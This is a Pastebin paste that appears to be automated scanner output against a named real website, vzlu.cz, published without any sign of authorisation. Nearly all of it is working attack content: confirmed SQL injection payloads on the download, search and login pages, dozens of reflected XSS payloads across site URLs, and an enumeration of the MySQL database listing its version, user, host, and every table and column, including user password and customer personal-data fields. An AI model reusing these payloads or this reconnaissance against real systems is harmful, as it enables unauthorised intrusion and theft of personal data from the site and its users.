API tools faq
paste
Advertisement
sroub3k

vzlu.cz

sroub3k
Apr 17th, 2013
332
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.64 KB | None | 0 0
raw download clone embed print report
  1. ||| SQL Injection
  2.  
  3. Severity: Critical
  4. Confirmation: Confirmed
  5. URL: http://www.vzlu.cz/download.php?file=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  6. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  7. Parameter Name: file
  8. Parameter Type: Querystring
  9. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  10.  
  11. ||| Boolean Based SQL Injection
  12.  
  13. Severity: Critical
  14. Confirmation: Confirmed
  15. URL: http://www.vzlu.cz/download.php?file=-1 OR 17-7=10
  16. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  17. Parameter Name: file
  18. Parameter Type: Querystring
  19. Attack Pattern: -1 OR 17-7=10
  20.  
  21. ||| [High Possibility] SQL Injection
  22.  
  23. Severity: Critical
  24. Confirmation: Confirmed
  25. URL: http://www.vzlu.cz/search.php?search='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  26. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  27. Parameter Name: search
  28. Parameter Type: Querystring
  29. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  30.  
  31. Severity: Critical
  32. Confirmation: Confirmed
  33. URL: http://www.vzlu.cz/login.php
  34. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  35. Parameter Name: email
  36. Parameter Type: Post
  37. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  38.  
  39. Severity: Critical
  40. Confirmation: Confirmed
  41. URL: http://www.vzlu.cz/old/index.php?page=%27
  42. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  43. Parameter Name: page
  44. Parameter Type: Querystring
  45. Attack Pattern: %27
  46.  
  47. Severity: Critical
  48. Confirmation: Confirmed
  49. URL: http://www.vzlu.cz/download.php?file=%27
  50. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  51. Parameter Name: file
  52. Parameter Type: Querystring
  53. Attack Pattern: %27
  54.  
  55. Severity: Critical
  56. Confirmation: Confirmed
  57. URL: http://www.vzlu.cz/new/search.php?search='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  58. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  59. Parameter Name: search
  60. Parameter Type: Querystring
  61. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  62.  
  63. Severity: Critical
  64. Confirmation: Confirmed
  65. URL: http://www.vzlu.cz/new/login.php
  66. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  67. Parameter Name: email
  68. Parameter Type: Post
  69. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  70.  
  71. ||| XSS (Cross-site Scripting)
  72.  
  73. Severity: Important
  74. Confirmation: Confirmed
  75. URL: http://www.vzlu.cz/?'"--></style></script><script>alert(0x002DE9)</script>
  76. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  77. Parameter Name: Query Based
  78. Parameter Type: FullQueryString
  79. Attack Pattern: '"--></style></script><script>alert(0x002DE9)</script>
  80.  
  81. Severity: Important
  82. Confirmation: Confirmed
  83. URL: http://www.vzlu.cz/cz/?'"--></style></script><script>alert(0x002DF1)</script>
  84. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  85. Parameter Name: Query Based
  86. Parameter Type: FullQueryString
  87. Attack Pattern: '"--></style></script><script>alert(0x002DF1)</script>
  88.  
  89. Severity: Important
  90. Confirmation: Confirmed
  91. URL: http://www.vzlu.cz/cz/mapa-stranek?'"--></style></script><script>alert(0x002DF8)</script>
  92. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  93. Parameter Name: Query Based
  94. Parameter Type: FullQueryString
  95. Attack Pattern: '"--></style></script><script>alert(0x002DF8)</script>
  96.  
  97. Severity: Important
  98. Confirmation: Confirmed
  99. URL: http://www.vzlu.cz/en/?'"--></style></script><script>alert(0x002DF9)</script>
  100. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  101. Parameter Name: Query Based
  102. Parameter Type: FullQueryString
  103. Attack Pattern: '"--></style></script><script>alert(0x002DF9)</script>
  104.  
  105. Severity: Important
  106. Confirmation: Confirmed
  107. URL: http://www.vzlu.cz/cz/aktivity/?'"--></style></script><script>alert(0x002DFD)</script>
  108. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  109. Parameter Name: Query Based
  110. Parameter Type: FullQueryString
  111. Attack Pattern: '"--></style></script><script>alert(0x002DFD)</script>
  112.  
  113. Severity: Important
  114. Confirmation: Confirmed
  115. URL: http://www.vzlu.cz/cz/spolecnost/?'"--></style></script><script>alert(0x002DFE)</script>
  116. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  117. Parameter Name: Query Based
  118. Parameter Type: FullQueryString
  119. Attack Pattern: '"--></style></script><script>alert(0x002DFE)</script>
  120.  
  121. Severity: Important
  122. Confirmation: Confirmed
  123. URL: http://www.vzlu.cz/cz/vyzkumne-projekty/?'"--></style></script><script>alert(0x002E4C)</script>
  124. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  125. Parameter Name: Query Based
  126. Parameter Type: FullQueryString
  127. Attack Pattern: '"--></style></script><script>alert(0x002E4C)</script>
  128.  
  129. Severity: Important
  130. Confirmation: Confirmed
  131. URL: http://www.vzlu.cz/cz/publikace/?'"--></style></script><script>alert(0x002E5A)</script>
  132. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  133. Parameter Name: Query Based
  134. Parameter Type: FullQueryString
  135. Attack Pattern: '"--></style></script><script>alert(0x002E5A)</script>
  136.  
  137. Severity: Important
  138. Confirmation: Confirmed
  139. URL: http://www.vzlu.cz/cz/transfer-vysledku/?'"--></style></script><script>alert(0x002E5B)</script>
  140. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  141. Parameter Name: Query Based
  142. Parameter Type: FullQueryString
  143. Attack Pattern: '"--></style></script><script>alert(0x002E5B)</script>
  144.  
  145. Severity: Important
  146. Confirmation: Confirmed
  147. URL: http://www.vzlu.cz/cz/aktualne/?'"--></style></script><script>alert(0x002E70)</script>
  148. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  149. Parameter Name: Query Based
  150. Parameter Type: FullQueryString
  151. Attack Pattern: '"--></style></script><script>alert(0x002E70)</script>
  152.  
  153. Severity: Important
  154. Confirmation: Confirmed
  155. URL: http://www.vzlu.cz/cz/registrace?'"--></style></script><script>alert(0x002E74)</script>
  156. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  157. Parameter Name: Query Based
  158. Parameter Type: FullQueryString
  159. Attack Pattern: '"--></style></script><script>alert(0x002E74)</script>
  160.  
  161. Severity: Important
  162. Confirmation: Confirmed
  163. URL: http://www.vzlu.cz/en/news/?'"--></style></script><script>alert(0x002E8E)</script>
  164. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  165. Parameter Name: Query Based
  166. Parameter Type: FullQueryString
  167. Attack Pattern: '"--></style></script><script>alert(0x002E8E)</script>
  168.  
  169. Severity: Important
  170. Confirmation: Confirmed
  171. URL: http://www.vzlu.cz/en/news/actual-events/?'"--></style></script><script>alert(0x002E9B)</script>
  172. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  173. Parameter Name: Query Based
  174. Parameter Type: FullQueryString
  175. Attack Pattern: '"--></style></script><script>alert(0x002E9B)</script>
  176.  
  177. Severity: Important
  178. Confirmation: Confirmed
  179. URL: http://www.vzlu.cz/search.php?'"--></style></script><script>alert(0x002ED6)</script>
  180. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  181. Parameter Name: Query Based
  182. Parameter Type: FullQueryString
  183. Attack Pattern: '"--></style></script><script>alert(0x002ED6)</script>
  184.  
  185. Severity: Important
  186. Confirmation: Confirmed
  187. URL: http://www.vzlu.cz/cz/spolecnost/profil-spolecnosti/?'"--></style></script><script>alert(0x002F6E)</script>
  188. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  189. Parameter Name: Query Based
  190. Parameter Type: FullQueryString
  191. Attack Pattern: '"--></style></script><script>alert(0x002F6E)</script>
  192.  
  193. Severity: Important
  194. Confirmation: Confirmed
  195. URL: http://www.vzlu.cz/cz/vyzkumne-projekty/mezinarodni-projekty/ramcove-programy-eu?'"--></style></script><script>alert(0x002FAE)</script>
  196. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  197. Parameter Name: Query Based
  198. Parameter Type: FullQueryString
  199. Attack Pattern: '"--></style></script><script>alert(0x002FAE)</script>
  200.  
  201. Severity: Important
  202. Confirmation: Confirmed
  203. URL: http://www.vzlu.cz/cz/spolecnost/profil-spolecnosti/zakladni-informace?'"--></style></script><script>alert(0x002FB0)</script>
  204. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  205. Parameter Name: Query Based
  206. Parameter Type: FullQueryString
  207. Attack Pattern: '"--></style></script><script>alert(0x002FB0)</script>
  208.  
  209. Severity: Important
  210. Confirmation: Confirmed
  211. URL: http://www.vzlu.cz/cz/transfer-vysledku/clanky-v-odbornych-periodicich-j/?'"--></style></script><script>alert(0x002FCB)</script>
  212. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  213. Parameter Name: Query Based
  214. Parameter Type: FullQueryString
  215. Attack Pattern: '"--></style></script><script>alert(0x002FCB)</script>
  216.  
  217. Severity: Important
  218. Confirmation: Confirmed
  219. URL: http://www.vzlu.cz/cz/transfer-vysledku/dalsi-aplikovane-vystupy-z-g-n/?'"--></style></script><script>alert(0x002FD1)</script>
  220. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  221. Parameter Name: Query Based
  222. Parameter Type: FullQueryString
  223. Attack Pattern: '"--></style></script><script>alert(0x002FD1)</script>
  224.  
  225. Severity: Important
  226. Confirmation: Confirmed
  227. URL: http://www.vzlu.cz/cz/vyzkumne-projekty/mezinarodni-projekty/?'"--></style></script><script>alert(0x002FD6)</script>
  228. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  229. Parameter Name: Query Based
  230. Parameter Type: FullQueryString
  231. Attack Pattern: '"--></style></script><script>alert(0x002FD6)</script>
  232.  
  233. Severity: Important
  234. Confirmation: Confirmed
  235. Detection Accuracy :
  236. Vulnerable URL : http://www.vzlu.cz/cz/spolecnost/profil-spolecnosti/organizacni-struktura-a-management?'"--></style></script><script>alert(0x002FFA)</script>
  237. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  238. Parameter Name: Query Based
  239. Parameter Type: FullQueryString
  240. Attack Pattern: '"--></style></script><script>alert(0x002FFA)</script>
  241.  
  242. Severity: Important
  243. Confirmation: Confirmed
  244. URL: http://www.vzlu.cz/cz/transfer-vysledku/certifikovane-metodiky-n-met/?'"--></style></script><script>alert(0x003001)</script>
  245. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  246. Parameter Name: Query Based
  247. Parameter Type: FullQueryString
  248. Attack Pattern: '"--></style></script><script>alert(0x003001)</script>
  249.  
  250. Severity: Important
  251. Confirmation: Confirmed
  252. URL: http://www.vzlu.cz/cz/transfer-vysledku/overene-technologie-z-tech/?'"--></style></script><script>alert(0x003007)</script>
  253. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  254. Parameter Name: Query Based
  255. Parameter Type: FullQueryString
  256. Attack Pattern: '"--></style></script><script>alert(0x003007)</script>
  257.  
  258. Severity: Important
  259. Confirmation: Confirmed
  260. URL: http://www.vzlu.cz/cz/transfer-vysledku/prototypy-g-prot/?'"--></style></script><script>alert(0x003029)</script>
  261. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  262. Parameter Name: Query Based
  263. Parameter Type: FullQueryString
  264. Attack Pattern: '"--></style></script><script>alert(0x003029)</script>
  265.  
  266. Severity: Important
  267. Confirmation: Confirmed
  268. URL: http://www.vzlu.cz/cz/transfer-vysledku/clanky-ve-sbornicich-d/?'"--></style></script><script>alert(0x003036)</script>
  269. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  270. Parameter Name: Query Based
  271. Parameter Type: FullQueryString
  272. Attack Pattern: '"--></style></script><script>alert(0x003036)</script>
  273.  
  274. Severity: Important
  275. Confirmation: Confirmed
  276. URL: http://www.vzlu.cz/cz/transfer-vysledku/usporadani-workshopu-w/?'"--></style></script><script>alert(0x003056)</script>
  277. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  278. Parameter Name: Query Based
  279. Parameter Type: FullQueryString
  280. Attack Pattern: '"--></style></script><script>alert(0x003056)</script>
  281.  
  282. Severity: Important
  283. Confirmation: Confirmed
  284. URL: http://www.vzlu.cz/cz/transfer-vysledku/kapitoly-v-odbornych-knihach-c/?'"--></style></script><script>alert(0x003055)</script>
  285. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  286. Parameter Name: Query Based
  287. Parameter Type: FullQueryString
  288. Attack Pattern: '"--></style></script><script>alert(0x003055)</script>
  289.  
  290. Severity: Important
  291. Confirmation: Confirmed
  292. URL: http://www.vzlu.cz/cz/registrace
  293. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  294. Parameter Name: heslo
  295. Parameter Type: Post
  296. Attack Pattern: "></style><script>alert(9)</script>
  297.  
  298. Severity: Important
  299. Confirmation: Confirmed
  300. URL: http://www.vzlu.cz/en/results-transfer/?'"--></style></script><script>alert(0x0031CA)</script>
  301. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  302. Parameter Name: Query Based
  303. Parameter Type: FullQueryString
  304. Attack Pattern: '"--></style></script><script>alert(0x0031CA)</script>
  305.  
  306. Severity: Important
  307. Confirmation: Confirmed
  308. URL: http://www.vzlu.cz/en/results-transfer/articles-in-scietific-journals-j/?'"--></style></script><script>alert(0x0031DB)</script>
  309. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  310. Parameter Name: Query Based
  311. Parameter Type: FullQueryString
  312. Attack Pattern: '"--></style></script><script>alert(0x0031DB)</script>
  313.  
  314. Severity: Important
  315. Confirmation: Confirmed
  316. URL: http://www.vzlu.cz/en/results-transfer/certified-methodology-n-met/?'"--></style></script><script>alert(0x00320A)</script>
  317. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  318. Parameter Name: Query Based
  319. Parameter Type: FullQueryString
  320. Attack Pattern: '"--></style></script><script>alert(0x00320A)</script>
  321.  
  322. Severity: Important
  323. Confirmation: Confirmed
  324. URL: http://www.vzlu.cz/download.php?file='"--></style></script><script>alert(0x003216)</script>
  325. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  326. Parameter Name: file
  327. Parameter Type: Querystring
  328. Attack Pattern: '"--></style></script><script>alert(0x003216)</script>
  329.  
  330. Severity: Important
  331. Confirmation: Confirmed
  332. URL: http://www.vzlu.cz/en/results-transfer/prototype-g-prot/?'"--></style></script><script>alert(0x003229)</script>
  333. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  334. Parameter Name: Query Based
  335. Parameter Type: FullQueryString
  336. Attack Pattern: '"--></style></script><script>alert(0x003229)</script>
  337.  
  338. Severity: Important
  339. Confirmation: Confirmed
  340. URL: http://www.vzlu.cz/en/results-transfer/articles-in-conference-proceedings-d/?'"--></style></script><script>alert(0x00323C)</script>
  341. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  342. Parameter Name: Query Based
  343. Parameter Type: FullQueryString
  344. Attack Pattern: '"--></style></script><script>alert(0x00323C)</script>
  345.  
  346. Severity: Important
  347. Confirmation: Confirmed
  348. URL: http://www.vzlu.cz/en/results-transfer/functional-sample-g-funk/?'"--></style></script><script>alert(0x00323F)</script>
  349. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  350. Parameter Name: Query Based
  351. Parameter Type: FullQueryString
  352. Attack Pattern: '"--></style></script><script>alert(0x00323F)</script>
  353.  
  354. Severity: Important
  355. Confirmation: Confirmed
  356. URL: http://www.vzlu.cz/en/results-transfer/verified-technology-z-tech/?'"--></style></script><script>alert(0x003243)</script>
  357. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  358. Parameter Name: Query Based
  359. Parameter Type: FullQueryString
  360. Attack Pattern: '"--></style></script><script>alert(0x003243)</script>
  361.  
  362. Severity: Important
  363. Confirmation: Confirmed
  364. URL: http://www.vzlu.cz/new/?'"--></style></script><script>alert(0x0032B1)</script>
  365. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  366. Parameter Name: Query Based
  367. Parameter Type: FullQueryString
  368. Attack Pattern: '"--></style></script><script>alert(0x0032B1)</script>
  369.  
  370. Severity: Important
  371. Confirmation: Confirmed
  372. URL: http://www.vzlu.cz/new/search.php?'"--></style></script><script>alert(0x0032C5)</script>
  373. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  374. Parameter Name: Query Based
  375. Parameter Type: FullQueryString
  376. Attack Pattern: '"--></style></script><script>alert(0x0032C5)</script>
  377.  
  378.  
  379. ||| MySQL Database Identified
  380.  
  381. Severity : Information
  382. Confirmation: Confirmed
  383. URL: http://www.vzlu.cz/download.php?file=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  384. Parameter Name: file
  385. Parameter Type: Querystring
  386. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  387.  
  388. ||| Info DB
  389.  
  390. Target: http://www.vzlu.cz/download.php?file=-1 OR 17-7=10
  391. DB Server: MySQL error based
  392. Resp. Time(avg): 1032 ms
  393. Current User: nh374901@localhost
  394. Sql Version: 5.5.28
  395. Current DB: nh374901db
  396. System User: nh374901@localhost
  397. Host Name: castor.dismedia.cz
  398. Installation dir: /usr/local/mysql
  399. DB User: 'nh374901'@'localhost'
  400. Data Bases: information_schema, nh374901db
  401.  
  402. DB: nh374901db
  403.  
  404. Count(table_name) of information_schema.tables where table_schema=0x6E683337343930316462 is 16
  405.  
  406. Table found: clanky
  407. Table found: clanky_dirs
  408. Table found: napiste_nam
  409. Table found: obrazky
  410. Table found: obrazky_dirs
  411. Table found: poll_data
  412. Table found: poll_voterip
  413. Table found: polls
  414. Table found: soubory
  415. Table found: soubory_dirs
  416. Table found: users
  417. Table found: users_actions_history
  418. Table found: users_logging
  419. Table found: videa
  420. Table found: videa_dirs
  421. Table found: zakaznici
  422.  
  423. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x636C616E6B79 is 20
  424. Column found: id
  425. Column found: nazev_cz
  426. Column found: nazev_en
  427. Column found: slogan_cz
  428. Column found: slogan_en
  429. Column found: text_cz
  430. Column found: text_en
  431. Column found: text_vpravo_cz
  432. Column found: text_vpravo_en
  433. Column found: obrazek_hlavni_id
  434. Column found: obrazek_spodek_id
  435. Column found: obrazky_dir_id
  436. Column found: soubory_dir_id
  437. Column found: videa_dir_id
  438. Column found: dir_id
  439. Column found: poradi
  440. Column found: vytvoreno
  441. Column found: ukonceno
  442. Column found: smazano
  443. Column found: zobrazovat
  444.  
  445. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x636C616E6B795F64697273 is 11
  446. Column found: id
  447. Column found: nazev_cz
  448. Column found: nazev_en
  449. Column found: slogan_cz
  450. Column found: text_cz
  451. Column found: text_en
  452. Column found: obrazek_id
  453. Column found: parent_id
  454. Column found: poradi
  455. Column found: zobrazovat
  456.  
  457. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x6E6170697374655F6E616D is 9
  458. Column found: id
  459. Column found: jmeno
  460. Column found: prijmeni
  461. Column found: firma
  462. Column found: email
  463. Column found: telefon
  464. Column found: dotaz
  465. Column found: odeslano
  466. Column found: ip
  467.  
  468. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x6F6272617A6B79 is 13
  469. Column found: id
  470. Column found: nazev_cz
  471. Column found: nazev_en
  472. Column found: popis_cz
  473. Column found: popis_en
  474. Column found: soubor
  475. Column found: dir_id
  476. Column found: sirka_org
  477. Column found: vyska_org
  478. Column found: pouzitelnost2
  479. Column found: orez_format2_x1
  480. Column found: orez_format2_y1
  481. Column found: poradi
  482.  
  483. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x6F6272617A6B795F64697273 is 4
  484. Column found: id
  485. Column found: nazev_cz
  486. Column found: nazev_en
  487. Column found: poradi
  488.  
  489. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x706F6C6C5F64617461 is 4
  490. Column found: id
  491. Column found: pollid
  492. Column found: text
  493. Column found: hits
  494.  
  495. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x706F6C6C5F766F7465726970 is 4
  496. Column found: id
  497. Column found: pollid
  498. Column found: ip
  499. Column found: vote_time
  500.  
  501. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x706F6C6C73 is 7
  502. Column found: id
  503. Column found: title
  504. Column found: voters
  505. Column found: created
  506. Column found: valid
  507. Column found: published
  508. Column found: lag
  509.  
  510. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x736F75626F7279 is 10
  511. Column found: id
  512. Column found: nazev_cz
  513. Column found: nazev_en
  514. Column found: popis_cz
  515. Column found: popis_en
  516. Column found: soubor
  517. Column found: pocet_stazeni
  518. Column found: zabezpeceni
  519. Column found: dir_id
  520. Column found: poradi
  521.  
  522. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x736F75626F72795F64697273 is 4
  523. Column found: id
  524. Column found: nazev_cz
  525. Column found: nazev_en
  526. Column found: zabezpeceni
  527.  
  528. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x7573657273 is 7
  529. Column found: id
  530. Column found: user
  531. Column found: pass
  532. Column found: lastaccess
  533. Column found: lastip
  534. Column found: created
  535. Column found: rights
  536.  
  537. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x75736572735F616374696F6E735F686973746F7279 is 7
  538. Column found: id
  539. Column found: akce
  540. Column found: tabulka
  541. Column found: zaznam_id
  542. Column found: user_id
  543. Column found: date_time
  544. Column found: ip
  545.  
  546. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x75736572735F6C6F6767696E67 is 8
  547. Column found: id
  548. Column found: user_id
  549. Column found: user_login
  550. Column found: date_time
  551. Column found: ip
  552. Column found: login
  553. Column found: pass
  554. Column found: success
  555.  
  556. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x7669646561 is 10
  557. Column found: id
  558. Column found: nazev_cz
  559. Column found: nazev_en
  560. Column found: popis_cz
  561. Column found: popis_en
  562. Column found: soubor
  563. Column found: youtube_code
  564. Column found: obrazek_id
  565. Column found: dir_id
  566. Column found: poradi
  567.  
  568. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x76696465615F64697273 is 4
  569. Column found: id
  570. Column found: nazev_cz
  571. Column found: nazev_en
  572. Column found: poradi
  573.  
  574. Count(column_name) of information_schema.columns where table_schema=0x6E683337343930316462 and table_name=0x7A616B617A6E696369 is 14
  575. Column found: id
  576. Column found: jmeno
  577. Column found: prijmeni
  578. Column found: firma
  579. Column found: ulice
  580. Column found: mesto
  581. Column found: psc
  582. Column found: stat
  583. Column found: telefon
  584. Column found: email
  585. Column found: heslo
  586. Column found: aktivni
  587. Column found: vytvoreno
  588. Column found: smazano
  589.  
  590.  
  591. >> Most of the items were in tests on stored passwords empty ! <<
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!